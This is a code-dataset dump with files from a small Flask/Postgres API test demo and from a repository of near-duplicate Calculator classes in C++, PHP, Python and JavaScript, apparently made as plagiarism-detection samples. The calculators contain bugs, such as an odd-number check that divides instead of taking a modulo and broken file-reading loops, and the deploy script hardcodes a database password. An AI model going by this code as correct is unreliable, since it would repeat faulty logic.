"path": "/api/integration-tests/features/steps/users_steps.py",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "from behave import given, when, then, step\n\n@given('The users API is up')\ndef is_user_api_up(context):\n pass\n\n@when('I call the user api to list the users')\ndef call_users_api(context):\n pass\n\n@then('I expect to see the users')\ndef validate_users_list(context):\n pass\n"
},
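The steps above are placeholders that always pass. A sketch of real implementations for the last two steps follows, hitting the `/user/` endpoint that app.py exposes; the `py-api` hostname mirrors the `--link` in test-api.sh, and the `requests` dependency is an assumption.

```python
# Sketch of filled-in behave steps -- NOT the repo's code. Endpoint and
# hostname come from app.py and test-api.sh; 'alejandro' from insert-users.sql.
import json
import requests
from behave import when, then

@when('I call the user api to list the users')
def call_users_api(context):
    context.response = requests.get('http://py-api:5000/user/')

@then('I expect to see the users')
def validate_users_list(context):
    assert context.response.status_code == 200
    users = json.loads(context.response.text)
    assert any(u['name'] == 'alejandro' for u in users)
```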
{
"alpha_fraction": 0.6461538672447205,
"alphanum_fraction": 0.6461538672447205,
"avg_line_length": 8.428571701049805,
"blob_id": "2c7cb15e4fe31d7b6f8c45c993b9f94f7a9d4d92",
"content_id": "e4ea530eb1a30b16d73f21148b646c0bbf389caa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 65,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 7,
"path": "/deploy.sh",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/sh\n\ncd db\nsh deploy-db.sh\n\ncd ../api\nsh deploy-api.sh"
},
{
"alpha_fraction": 0.7134146094322205,
"alphanum_fraction": 0.7195122241973877,
"avg_line_length": 26.41666603088379,
"blob_id": "271dcb8fbe5f69608de41627d13d8d3b280cdeb4",
"content_id": "5d6e97b7e7797ad972ef7c88d940a90d54539df2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 328,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 12,
"path": "/db/deploy-db.sh",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/sh\n\ndocker rm -f db\n\ndocker run --name db -e POSTGRES_PASSWORD=astrongpass -d postgres\n\necho \"Wait for db service up...\"\nsleep 15\n\ncat data/create-db.sql | docker exec -i db psql -U postgres\ncat data/create-schema.sql | docker exec -i db psql -U postgres\ncat data/insert-users.sql | docker exec -i db psql -U postgres"
},
{
"alpha_fraction": 0.5982906222343445,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 18.5,
"blob_id": "54fa88e8dfd00507fdb564c7e1a926844a4be8c2",
"content_id": "619eca9bc8592c5e18d99d8937beb62660339857",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 117,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 6,
"path": "/api/deploy-api-local.sh",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/sh\n\nsh build-api.sh\n\ndocker rm -f py-api\ndocker run -d --name=py-api -p 5000:5000 --link db:db flask-api\n"
},
{
"alpha_fraction": 0.7091836929321289,
"alphanum_fraction": 0.7091836929321289,
"avg_line_length": 13,
"blob_id": "4e529c2d234d058762f3160f34a5c4a9c4195a59",
"content_id": "4ef5da24ad894d31d024a5475feff4e59bbf4b83",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 196,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 14,
"path": "/api/Dockerfile",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "FROM python\n\nCOPY ./dependencies /app/dependencies\n\nWORKDIR /app\n\nRUN pip install -r dependencies\n\nCOPY ./flask_web/ /app\nCOPY ./integration-tests/ /app\n\nENTRYPOINT [ \"python\" ]\n\nCMD [ \"app.py\" ]\n"
},
{
"alpha_fraction": 0.6611111164093018,
"alphanum_fraction": 0.6722221970558167,
"avg_line_length": 21.5,
"blob_id": "aded44cf47b9936b25b6813c7b71a0a848815ad6",
"content_id": "44992dbd6d472d0eeaf5e90073fb5b373fcf742c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 360,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 16,
"path": "/api/flask_web/app.py",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "from flask import (\n Flask,\n render_template\n)\nfrom connect_db import getAllUsers\n\n# Create the application instance\napp = Flask(__name__, template_folder=\"templates\")\n\[email protected]('/user/')\ndef user():\n return getAllUsers()\n\n# If we're running in stand alone mode, run the application\nif __name__ == '__main__':\n app.run(debug=True,host='0.0.0.0')\n"
},
{
"alpha_fraction": 0.737500011920929,
"alphanum_fraction": 0.737500011920929,
"avg_line_length": 19,
"blob_id": "0888f4409b7dfb412397e71b5b58421a016b1a9e",
"content_id": "095c2c81cb46bc15f28e52f384ede71c92c91d93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 160,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 8,
"path": "/README.md",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "# py-automation-example\n\nExample of automated tests for an api\nStack:\n* db: postgres\n* api: flask (python)\n* automation framework: behave (python)\n* ci: travis\n"
},
{
"alpha_fraction": 0.6800000071525574,
"alphanum_fraction": 0.6800000071525574,
"avg_line_length": 24,
"blob_id": "088c2b946aaa6c556677bad09f497bedd9d3e1eb",
"content_id": "d632172dbe5842e2a72ddfa5cf202118ce3a76d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 50,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 2,
"path": "/api/build-api.sh",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/sh\ndocker build -t flask-api:latest .\n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 59.20000076293945,
"blob_id": "8f750e90c5406b6b8813a5412ab8aa1b4a7dc6c0",
"content_id": "77b5b8d7248068829303f3d8cea9894c447bf5a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 300,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 5,
"path": "/db/data/insert-users.sql",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "\\c \"api-database\";\n\nINSERT INTO public.\"user\" (\tuser_id, name ) VALUES ( nextval('public.seq_user'), 'alejandro' );\nINSERT INTO public.\"user\" (\tuser_id, name ) VALUES ( nextval('public.seq_user'), 'luisa' );\nINSERT INTO public.\"user\" (\tuser_id, name ) VALUES ( nextval('public.seq_user'), 'martin' );"
},
{
"alpha_fraction": 0.6575682163238525,
"alphanum_fraction": 0.6650124192237854,
"avg_line_length": 15.791666984558105,
"blob_id": "6a6b62a321445fa80d7f23b10af3516c292fca4c",
"content_id": "dcd79e9e52ae699f994447473ffe97605891ef0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 403,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 24,
"path": "/db/data/create-schema.sql",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "\\c \"api-database\";\n\nCREATE SEQUENCE public.seq_user\n INCREMENT 1\n START 1\n MINVALUE 1\n;\n\nCREATE TABLE public.\"user\"\n(\n user_id serial NOT NULL,\n name character varying NOT NULL,\n PRIMARY KEY (user_id)\n)\nWITH (\n OIDS = FALSE\n);\n\nALTER TABLE public.\"user\"\n OWNER to postgres;\n\nALTER TABLE ONLY public.\"user\"\n ALTER COLUMN user_id \n SET DEFAULT nextval('seq_user'::regclass);\n"
}
] | 14 |
rvsia/plagiarism-source-code-examples
|
https://github.com/rvsia/plagiarism-source-code-examples
|
9ce730e9f840c8a79821c582a07d27295d786ee4
|
dd2fe3a06b69e5b7b873be25e35e8fab0492c6b3
|
47e7bf2f62089ec982c770b7ba2a30628816858d
|
refs/heads/master
| 2020-04-17T19:48:13.238358 | 2019-02-17T20:00:16 | 2019-02-17T20:00:16 | 166,879,343 | 0 | 0 | null | 2019-01-21T20:54:46 | 2019-02-10T20:30:51 | 2019-02-10T20:38:28 |
C++
|
[
{
"alpha_fraction": 0.5967620611190796,
"alphanum_fraction": 0.6080572009086609,
"avg_line_length": 25.04901885986328,
"blob_id": "139d2aa3c2972870df5638af82dd84e3194d4125",
"content_id": "d0c8a7280813046577e33a013369895afb619d08",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2656,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 102,
"path": "/php/Calculator.php",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "<?php\nclass Calculator {\n\t// History of $results\n\tprivate $history = array();\n\t\n\t// Constructor for loading results from file\n\tpublic function __construct($fileName = '') {\n\t\t$this->loadHistoryFromFile($fileName);\n\t\t$this->print(\"Calculator was created\");\n\t}\n\t\n\t// Prints text with current date\n\tpublic function print($text) {\n\t\t$date = date('m/d/Y h:i:s a', time());\n\t echo \"# \" . $date . \" # \" . $text;\n\t}\n\t\n\t// Adds two numbers\n\tpublic function addition($number1, $number2) {\n\t\t$result = $number1 + $number2;\n\t\t$this->print(\"Result od addition is \" . $result);\n\t\t$this->addToHistory($result);\n\t\treturn $result;\n\t}\n\t\n\t// Subtracts two numbers\n\tpublic function substraction( $number1, $number2) {\n\t\t$result = $number1 - $number2;\n\t\t$this->print(\"Result od substraction is \" . $result);\n\t\t$this->addToHistory($result);\n\t\treturn $result;\n\t}\n\t\n\t\n\t// Multiplies two numbers\n\tpublic function multiplication( $number1, $number2) {\n\t\t$result = $number1 * $number2;\n\t\t$this->print(\"Result od multiplication is \" . $result);\n\t\t$this->addToHistory($result);\n\t\treturn $result;\n\t}\n\t\n\t// Divides two numbers\n\tpublic function division( $number1, $number2) {\n\t\t$result = $number1 / $number2;\n\t\t$this->print(\"Result od division is \" . $result);\n\t\t$this->addToHistory($result);\n\t\treturn $result;\n\t}\n\t\n\t// Adds $result to history array\n\tprivate function addToHistory($item) {\n array_push($this->history, $item);\n\t}\n\t\n\t// Print the whole history\n\tpublic function printHistory() {\n\t\tforeach ( $this->history as $result) {\n\t\t\t$this->print($result);\n\t\t}\n\t}\n\t\n\t// Compare two numbers\n\tpublic function compareNumbers( $number1, $number2) {\n\t\tif ($number1 > $number2) {\n\t\t\t$this->print($number1 . \" is bigger than \" . $number2);\n\t\t} else if ($number2 > $number1) {\n\t\t\t$this->print($number1 . \" is smaller than \" . $number2);\n\t\t} else {\n\t\t\t$this->print($number1 . \" is the same as \" . $number2);\n\t\t}\n\t}\n\t\n\t// Adds $results to history\n\tpublic function loadHistoryFromFile($fileName) {\n if($fileName !== '')\n try {\n\t\t\t$file = fopen($fileName, \"r\");\n $readLine = \"\";\n while (($readLine = fgets($file)) !== false) {\n $this->addToHistory($readLine);\n }\n fclose($file);\n $this->print(\"History form file was loaded!\");\n\t\t} catch (Exception $e) {\n\t\t\t$this->print(\"File could not be loaded! Because:\" . $e);\n\t\t}\n\t}\n\t\n\t// Returns if number is odd\n\tpublic function isOdd( $number) {\n\t\t$boolIsOdd = ($number/2) != 0;\n\t\tswitch ($boolIsOdd) {\n\t\t\tcase true:\n\t\t\t\t$this->print($number . \" is odd!\");\n\t\t\t\treturn true;\n\t\t\tcase false: \n\t\t\t\t$this->print($number . \" is not odd!\");\n\t\t\t\treturn false;\n\t\t}\n\t}\n}"
},
{
"alpha_fraction": 0.5577388405799866,
"alphanum_fraction": 0.566807746887207,
"avg_line_length": 28.026315689086914,
"blob_id": "8f26d4015e411f0039534ebd7a6fc6e7d0432e17",
"content_id": "a6c276ebe364ea132522c8536e95b08c14523a99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3308,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 114,
"path": "/c++/Calculator.1.cpp",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <string>\n#include <vector>\n#include <chrono>\n#include <ctime>\n#include <fstream>\n\nusing namespace std;\n\n// Computer class\nclass Computer {\n // records of results\nprivate: vector<float> records;\n\n // Constructor for loading results from file\n public: Computer(string path) {\n pushResultsData(path);\n log(\"Computer was created\");\n }\n \n Computer() {\n log(\"Computer was created\");\n }\n\n // Prints content with current time\n public: void log(string content) {\n std::time_t time = std::chrono::system_clock::to_time_t(std::chrono::system_clock::now());\n std::cout << \"# \" << std::ctime(&time) << \" # \" << content;\n }\n\n // Adds two numbers\n public: float plus(float numeral1, float numeral2) {\n float outcome = numeral1 + numeral2;\n log(\"outcome od plus is \" + to_string(outcome));\n pushResult(outcome);\n return outcome;\n }\n\n // Subtracts two numbers\n public: float minus(float numeral1, float numeral2) {\n float outcome = numeral1 - numeral2;\n log(\"outcome od minus is \" + to_string(outcome));\n pushResult(outcome);\n return outcome;\n }\n\n\n // Multiplies two numbers\n public: float multiply(float numeral1, float numeral2) {\n float outcome = numeral1 * numeral2;\n log(\"outcome od multiply is \" + to_string(outcome));\n pushResult(outcome);\n return outcome;\n }\n\n // Divides two numbers\n public: float divide(float numeral1, float numeral2) {\n float outcome = numeral1 / numeral2;\n log(\"outcome od divide is \" + to_string(outcome));\n pushResult(outcome);\n return outcome;\n }\n\n // Adds outcome to records array\n private: void pushResult(float element) {\n records.push_back(element);\n }\n\n // log the whole records\n public: void logResults() {\n for (float outcome: records) {\n log(to_string(outcome));\n }\n }\n\n // Compare two numbers\n public: void comparisonNumerals(float numeral1, float numeral2) {\n if (numeral1 > numeral2) {\n log(to_string(numeral1) + \" is bigger than \" + to_string(numeral2));\n } else if (numeral2 > numeral1) {\n log(to_string(numeral1) + \" is smaller than \" + to_string(numeral2));\n } else {\n log(to_string(numeral1) + \" is the same as \" + to_string(numeral2));\n }\n }\n\n // Adds results to records\n public: void pushResultsData(string path) {\n try {\n std::ifstream data(path);\n string row = \"\";\n while (getline(data, row)) {\n pushResult(stof(row));\n }\n data.close();\n log(\"records form file was loaded!\");\n } catch (const std::exception& error) {\n log(\"File could not be loaded! Because:\" + std::string(error.what()));\n }\n }\n\n // Returns if numeral is odd\n public: bool uneven(float numeral) {\n bool booleanUneven = (numeral/2) != 0;\n switch (booleanUneven) {\n case true:\n log(to_string(numeral) + \" is odd!\");\n return true;\n case false:\n log(to_string(numeral) + \" is not odd!\");\n return false;\n }\n }\n};"
},
{
"alpha_fraction": 0.5811293721199036,
"alphanum_fraction": 0.5918512940406799,
"avg_line_length": 26.441177368164062,
"blob_id": "5df6afd16bdea2dd46bad658d45fe454da6a8cdf",
"content_id": "dabcd1e4e30b66c270a12e4224e5b84ed1fe1a0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2798,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 102,
"path": "/php/Calculator.2.php",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "<?php\nclass Calculator {\n\t// m_history of $results\n\tprivate $m_history = array();\n\t\n\t// Constructor for loading results from file\n\tpublic function __construct($file_name = '') {\n\t\t$this->load_history_from_file($file_name);\n\t\t$this->f_print(\"Calculator was created\");\n\t}\n\t\n\t// Prints text with current date\n\tpublic function f_print($text) {\n\t\t$date = date('m/d/Y h:i:s a', time());\n\t echo \"# \" . $date . \" # \" . $text;\n\t}\n\t\n\t// Adds two numbers\n\tpublic function f_addition($number_1, $number_2) {\n\t\t$result = $number_1 + $number_2;\n\t\t$this->f_print(\"Result od f_addition is \" . $result);\n\t\t$this->add_to_history($result);\n\t\treturn $result;\n\t}\n\t\n\t// Subtracts two numbers\n\tpublic function f_substraction( $number_1, $number_2) {\n\t\t$result = $number_1 - $number_2;\n\t\t$this->f_print(\"Result od f_substraction is \" . $result);\n\t\t$this->add_to_history($result);\n\t\treturn $result;\n\t}\n\t\n\t\n\t// Multiplies two numbers\n\tpublic function f_multiplication( $number_1, $number_2) {\n\t\t$result = $number_1 * $number_2;\n\t\t$this->f_print(\"Result od f_multiplication is \" . $result);\n\t\t$this->add_to_history($result);\n\t\treturn $result;\n\t}\n\t\n\t// Divides two numbers\n\tpublic function f_division( $number_1, $number_2) {\n\t\t$result = $number_1 / $number_2;\n\t\t$this->f_print(\"Result od f_division is \" . $result);\n\t\t$this->add_to_history($result);\n\t\treturn $result;\n\t}\n\t\n\t// Adds $result to m_history array\n\tprivate function add_to_history($l_item) {\n array_push($this->m_history, $l_item);\n\t}\n\t\n\t// f_print the whole m_history\n\tpublic function print_history() {\n\t\tforeach ( $this->m_history as $result) {\n\t\t\t$this->f_print($result);\n\t\t}\n\t}\n\t\n\t// Compare two numbers\n\tpublic function compare_numbers( $number_1, $number_2) {\n\t\tif ($number_1 > $number_2) {\n\t\t\t$this->f_print($number_1 . \" is bigger than \" . $number_2);\n\t\t} else if ($number_2 > $number_1) {\n\t\t\t$this->f_print($number_1 . \" is smaller than \" . $number_2);\n\t\t} else {\n\t\t\t$this->f_print($number_1 . \" is the same as \" . $number_2);\n\t\t}\n\t}\n\t\n\t// Adds $results to m_history\n\tpublic function load_history_from_file($file_name) {\n if($file_name !== '')\n try {\n\t\t\t$l_file = fopen($file_name, \"r\");\n $read_line = \"\";\n while (($readLine = fgets($l_file)) !== false) {\n $this->add_to_history($read_line);\n }\n fclose($l_file);\n $this->f_print(\"m_history form file was loaded!\");\n\t\t} catch (Exception $e) {\n\t\t\t$this->f_print(\"File could not be loaded! Because:\" . $e);\n\t\t}\n\t}\n\t\n\t// Returns if l_number is odd\n\tpublic function is_odd( $l_number) {\n\t\t$bool_is_odd = ($l_number/2) != 0;\n\t\tswitch ($bool_is_odd) {\n\t\t\tcase true:\n\t\t\t\t$this->f_print($l_number . \" is odd!\");\n\t\t\t\treturn true;\n\t\t\tcase false: \n\t\t\t\t$this->f_print($l_number . \" is not odd!\");\n\t\t\t\treturn false;\n\t\t}\n\t}\n}"
},
{
"alpha_fraction": 0.5646234750747681,
"alphanum_fraction": 0.575131356716156,
"avg_line_length": 32.988094329833984,
"blob_id": "fa5a1fcbfa643ed770bca1a1b08253097fac3ceb",
"content_id": "e62841f33e466038b95792fc2d17dd98b01f4177",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2855,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 84,
"path": "/python/Calculator.2.py",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "import datetime\n\nclass Calculator:\n # m_history of results\n m_history = []\n\n # Constructor for loading results from file\n def __init__(self, file_name):\n self.load_history_from_file(file_name)\n self.f_print(\"Calculator was created\")\n\n # Prints text with current date\n def f_print(self, text):\n date = datetime.datetime.now()\n print(\"# \" + str(date) + \" # \" + text)\n\n # Add two numbers\n def f_addition(self, number_1, number_2):\n l_result = number_1 + number_2\n self.f_print('Result of f_addition is ' + str(l_result))\n self.add_to_history(l_result)\n return l_result\n\n # Substracts two numbers\n def f_substraction(self, number_1, number_2):\n l_result = number_1 - number_2\n self.f_print('Result of f_substraction is ' + str(l_result))\n self.add_to_history(l_result)\n return l_result\n\n # Multiplies two numbers\n def f_multiplication(self, number_1, number_2):\n l_result = number_1 * number_2\n self.f_print('Result of f_multiplication is ' + str(l_result))\n self.add_to_history(l_result)\n return l_result\n\n # Divides two numbers\n def f_division(self, number_1, number_2):\n l_result = number_1 / number_2\n self.f_print('Result of f_division is ' + str(l_result))\n self.add_to_history(l_result)\n return l_result\n\n # Adds l_result to m_history array\n def add_to_history(self, l_item):\n self.m_history.append(l_item)\n\n # f_print the whole m_history\n def print_history(self):\n for l_result in self.m_history:\n self.f_print(str(l_result))\n\n # Compare two numbers\n def compare_numbers(self, number_1, number_2):\n if number_1 > number_2:\n self.f_print(str(number_1) + \" is bigger than \" + str(number_2))\n elif number_2 > number_1:\n self.f_print(str(number_1) + \" is smaller than \" + str(number_2))\n else:\n self.f_print(str(number_1) + \" is the same as \" + str(number_2))\n\n # Adds results to m_history\n def load_history_from_file(self, file_name):\n try:\n l_file = open(file_name)\n read_line = l_file.readline()\n while read_line != None:\n self.add_to_history(read_line)\n read_line = l_file.read_line()\n file.close()\n self.f_print(\"m_history from file was loaded!\")\n except Exception:\n self.f_print(\"File could not be loaded! Because:\" + str(Exception))\n\n # Returns if l_number is odd\n def is_odd(self, l_number):\n bool_is_odd = l_number / 2 != 0\n if bool_is_odd:\n self.f_print(str(l_number) + \" is odd!\")\n return True\n if not bool_is_odd:\n self.f_print(str(l_number) + \" is not odd!\")\n return False\n"
},
{
"alpha_fraction": 0.6296456456184387,
"alphanum_fraction": 0.6434745192527771,
"avg_line_length": 21.69607925415039,
"blob_id": "6e84451ba74a626cce286669ceec60f688136a46",
"content_id": "fadbd0d4e3f4f3f564cd53f16d0208798ba35bc4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2314,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 102,
"path": "/javascript/Calculator.js",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "// Calculator class\n\nclass Calculator {\n\t// History of results\n history = [];\n\t\n\t// Constructor for loading results from file\n\tconstructor(fileName) {\n\t\tthis.loadHistoryFromFile(fileName);\n\t\tthis.print(\"Calculator was created\");\n\t}\n\t\n\t// Prints text with current date\n\tprint(text) {\n\t\tdate = new Date();\n\t console.log(\"# \" + date.toString() + \" # \" + text );\n\t}\n\t\n\t// Adds two numbers\n\taddition(number1, number2) {\n\t\tconst result = number1 + number2;\n\t\tthis.print(\"Result od addition is \" + result);\n\t\tthis.addToHistory(result);\n\t\treturn result;\n\t}\n\t\n\t// Subtracts two numbers\n\tsubstraction(number1, number2) {\n\t\tconst result = number1 - number2;\n\t\tthis.print(\"Result od substraction is \" + result);\n\t\tthis.addToHistory(result);\n\t\treturn result;\n\t}\n\t\n\t\n\t// Multiplies two numbers\n\tmultiplication(number1, number2) {\n\t\tconst result = number1 * number2;\n\t\tthis.print(\"Result od multiplication is \" + result);\n\t\tthis.addToHistory(result);\n\t\treturn result;\n\t}\n\t\n\t// Divides two numbers\n\tdivision(number1, number2) {\n\t\tconst result = number1 / number2;\n\t\tthis.print(\"Result od division is \" + result);\n\t\tthis.addToHistory(result);\n\t\treturn result;\n\t}\n\t\n\t// Adds result to history array\n\taddToHistory(item) {\n\t\tthis.history.append(item);\n\t}\n\t\n\t// Print the whole history\n\tprintHistory() {\n\t\tthis.history.forEach(function(result){\n\t\t\tthis.print(result);\n\t\t})\n\t}\n\t\n\t// Compare two numbers\n\tcompareNumbers(number1, number2) {\n\t\tif (number1 > number2) {\n\t\t\tthis.print(number1 + \" is bigger than \" + number2);\n\t\t} else if (number2 > number1) {\n\t\t\tthis.print(number1 + \" is smaller than \" + number2);\n\t\t} else {\n\t\t\tthis.print(number1 + \" is the same as \" + number2);\n\t\t}\n\t}\n\t\n\t// Adds results to history\n\tloadHistoryFromFile(fileName) {\n\t\ttry {\n\t\t\tfileName = fileName.split('\\n');\n\t\t\tconst readLine = 0;\n while (readLine < fileName.length) {\n\t\t\t\tthis.addToHistory(fileName[readLine]);\n\t\t\t\treadLine += 1;\n }\n this.print(\"History from file was loaded!\");\n\t\t} catch (e) {\n\t\t\tthis.print(\"File could not be loaded! Because:\" + e);\n\t\t}\n\t}\n\t\n\t// Returns if number is odd\n\tisOdd(number) {\n\t\tboolIsOdd = (number%2) != 0;\n\t\tswitch (boolIsOdd) {\n\t\t\tcase true:\n\t\t\t\tthis.print(number + \" is odd!\");\n\t\t\t\treturn true;\n\t\t\tcase false: \n\t\t\t\tthis.print(number + \" is not odd!\");\n\t\t\t\treturn false;\n\t\t}\n\t}\n}"
},
{
"alpha_fraction": 0.5727376937866211,
"alphanum_fraction": 0.5841924548149109,
"avg_line_length": 30.178571701049805,
"blob_id": "3107f64648131ed72b2af8bc9942e5a473866841",
"content_id": "c3952b34fd614ed1ad4e6923a70bf58cd34d51da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2619,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 84,
"path": "/python/Calculator.1.py",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "import datetime\n\nclass Computer:\n # records of results\n records = []\n\n # Constructor for loading results from file\n def __init__(self, path):\n self.pushResultsData(path)\n self.log(\"Computer was created\")\n\n # Prints content with current time\n def log(self, content):\n time = datetime.datetime.now()\n print(\"# \" + str(time) + \" # \" + content)\n\n # Add two numbers\n def plus(self, numeral1, numeral2):\n outcome = numeral1 + numeral2\n self.log('outcome of plus is ' + str(outcome))\n self.pushResult(outcome)\n return outcome\n\n # Substracts two numbers\n def minus(self, numeral1, numeral2):\n outcome = numeral1 - numeral2\n self.log('outcome of minus is ' + str(outcome))\n self.pushResult(outcome)\n return outcome\n\n # Multiplies two numbers\n def multiply(self, numeral1, numeral2):\n outcome = numeral1 * numeral2\n self.log('outcome of multiply is ' + str(outcome))\n self.pushResult(outcome)\n return outcome\n\n # Divides two numbers\n def divide(self, numeral1, numeral2):\n outcome = numeral1 / numeral2\n self.log('outcome of divide is ' + str(outcome))\n self.pushResult(outcome)\n return outcome\n\n # Adds outcome to records array\n def pushResult(self, element):\n self.records.append(element)\n\n # log the whole records\n def logResults(self):\n for outcome in self.records:\n self.log(str(outcome))\n\n # Compare two numbers\n def comparisonNumerals(self, numeral1, numeral2):\n if numeral1 > numeral2:\n self.log(str(numeral1) + \" is bigger than \" + str(numeral2))\n elif numeral2 > numeral1:\n self.log(str(numeral1) + \" is smaller than \" + str(numeral2))\n else:\n self.log(str(numeral1) + \" is the same as \" + str(numeral2))\n\n # Adds results to records\n def pushResultsData(self, path):\n try:\n data = open(path)\n row = data.row()\n while row != None:\n self.pushResult(row)\n row = data.row()\n data.close()\n self.log(\"records from file was loaded!\")\n except Exception:\n self.log(\"File could not be loaded! Because:\" + str(Exception))\n\n # Returns if numeral is odd\n def uneven(self, numeral):\n booleanUneven = numeral / 2 != 0\n if booleanUneven:\n self.log(str(numeral) + \" is odd!\")\n return True\n if not booleanUneven:\n self.log(str(numeral) + \" is not odd!\")\n return False\n"
},
{
"alpha_fraction": 0.5517436861991882,
"alphanum_fraction": 0.5602495074272156,
"avg_line_length": 29.947368621826172,
"blob_id": "ba6d2f7717a15ff8af6efd75cff53f661bd3cba3",
"content_id": "b6cf2fe9947a7f68097a3ece04479917851b2612",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3527,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 114,
"path": "/c++/Calculator.2.cpp",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <string>\n#include <vector>\n#include <chrono>\n#include <ctime>\n#include <fstream>\n\nusing namespace std;\n\n// Calculator class\nclass Calculator {\n // m_history of results\nprivate: vector<float> m_history;\n\n // Constructor for loading results from file\n public: Calculator(string file_name) {\n load_history_from_file(file_name);\n f_print(\"Calculator was created\");\n }\n \n Calculator() {\n f_print(\"Calculator was created\");\n }\n\n // Prints text with current date\n public: void f_print(string text) {\n std::time_t date = std::chrono::system_clock::to_time_t(std::chrono::system_clock::now());\n std::cout << \"# \" << std::ctime(&date) << \" # \" << text;\n }\n\n // Adds two numbers\n public: float f_addition(float number_1, float number_2) {\n float l_result = number_1 + number_2;\n f_print(\"Result od f_addition is \" + to_string(l_result));\n add_to_history(l_result);\n return l_result;\n }\n\n // Subtracts two numbers\n public: float f_substraction(float number_1, float number_2) {\n float l_result = number_1 - number_2;\n f_print(\"Result od f_substraction is \" + to_string(l_result));\n add_to_history(l_result);\n return l_result;\n }\n\n\n // Multiplies two numbers\n public: float f_multiplication(float number_1, float number_2) {\n float l_result = number_1 * number_2;\n f_print(\"Result od f_multiplication is \" + to_string(l_result));\n add_to_history(l_result);\n return l_result;\n }\n\n // Divides two numbers\n public: float f_division(float number_1, float number_2) {\n float l_result = number_1 / number_2;\n f_print(\"Result od f_division is \" + to_string(l_result));\n add_to_history(l_result);\n return l_result;\n }\n\n // Adds l_result to m_history array\n private: void add_to_history(float l_item) {\n m_history.push_back(l_item);\n }\n\n // f_print the whole m_history\n public: void print_history() {\n for (float l_result: m_history) {\n f_print(to_string(l_result));\n }\n }\n\n // Compare two numbers\n public: void compare_numbers(float number_1, float number_2) {\n if (number_1 > number_2) {\n f_print(to_string(number_1) + \" is bigger than \" + to_string(number_2));\n } else if (number_2 > number_1) {\n f_print(to_string(number_1) + \" is smaller than \" + to_string(number_2));\n } else {\n f_print(to_string(number_1) + \" is the same as \" + to_string(number_2));\n }\n }\n\n // Adds results to m_history\n public: void load_history_from_file(string file_name) {\n try {\n std::ifstream file(file_name);\n string read_line = \"\";\n while (getline(file, read_line)) {\n add_to_history(stof(read_line));\n }\n file.close();\n f_print(\"m_history form file was loaded!\");\n } catch (const std::exception& e) {\n f_print(\"File could not be loaded! Because:\" + std::string(e.what()));\n }\n }\n\n // Returns if l_number is odd\n public: bool is_odd(float l_number) {\n bool bool_is_odd = (l_number/2) != 0;\n switch (bool_is_odd) {\n case true:\n f_print(to_string(l_number) + \" is odd!\");\n return true;\n case false:\n f_print(to_string(l_number) + \" is not odd!\");\n return false;\n }\n }\n};"
},
